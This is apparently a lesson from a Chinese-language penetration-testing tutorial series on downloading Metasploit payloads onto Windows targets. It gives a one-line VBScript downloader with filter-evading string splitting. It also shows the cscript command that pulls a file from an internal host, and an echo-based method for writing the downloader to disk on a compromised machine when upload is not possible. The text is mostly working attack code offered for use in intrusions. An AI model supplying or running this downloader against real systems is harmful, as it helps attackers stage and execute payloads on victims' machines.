第三十七课:vbs一句话下载payload
专注APT攻击与防御
https://micropoor.blogspot.com/
一次msf完整的流程离不开目标机的payload下载与执行。而针对不同环境目标,考虑或者选择不同方式的payload下载与执行。如webshell下,注入点下。smb下等。而针对不同的实际环境,来做最好的选择。既然本季开始专门针对windows下的payload下载讲解,那么就需要考虑到目标机的系
统版本,是windows2000,windows 2003,或者是更高的版本如windows 2016等。无论是哪个版本的windows系列,都是支持vbs的。
靶机:windows 2003
vbs:
保存downfile.vbs
set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open
"get",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2
命令行下执行:
1 cscript downfile.vbs http://192.168.1.115/robots.txt C:Inetpubb.txt
往往在实战中,没有上传的方便条件,尤其是目标机是windows,只有echo方式来写入vbs。
命令行下执行:
echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(
0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2
>>downfile.vbs
优点:支持windows全版本系列
缺点:对https不友好
Micropoor
⋮
